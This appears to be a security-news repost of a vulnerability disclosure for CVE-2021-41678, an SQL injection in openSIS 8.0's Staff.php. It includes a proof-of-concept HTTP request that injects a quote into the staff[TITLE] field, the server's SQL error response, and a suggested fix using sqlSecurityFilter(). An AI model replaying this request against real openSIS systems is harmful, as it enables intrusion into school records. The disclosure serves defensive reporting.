Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-41678: SQL injection in function STAFF.PHP · Issue #203 · OS4ED/openSIS-Classic

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff{TITLE] parameter.

CVE
#sql#vulnerability#web#windows#debian#apache#git

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff[TITLE] parameter.
image
image

POC
image
REQUEST

POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129
Content-Length: 132296
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[TITLE]"

'
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[FIRST_NAME]


-----------------------------42647140374471146523868129 
Content-Disposition: form-data; name="staff[MIDDLE_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[LAST_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[NAME_SUFFIX]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ALTERNATE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[GENDER]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="month_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="day_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="year_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ETHNICITY_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[EMAIL]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]"

N
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[DISABILITY_DESC]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="file"; filename="alf\'a.php"
Content-Type: image/png


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="imgblob"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="upbtn"

UPLOAD
-----------------------------42647140374471146523868129--

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
        <TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD>
        </TR>
        </TR><TR>
            <TD align=right><b>Traceback:</b></TD>
            <TD>/var/www/opensis/modules/users/Staff.php at 590</TD>
        </TR>
        </TR><TR>
            <TD align=right><b>Additional Information:</b></TD>
            <TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD>
        </TR>
        </TABLE>
        <TABLE CELLSPACING=10 BORDER=0>
[…]

SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST[‘staff’] to $value param.

  $staffs=sqlSecurityFilter($_REQUEST['staff']);
            foreach ($staffs as $column => $value) {
                if ($column == 'BIRTHDATE' && $value!='')
                {
                    $value = date("Y-m-d", strtotime($value));
                   
                }

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907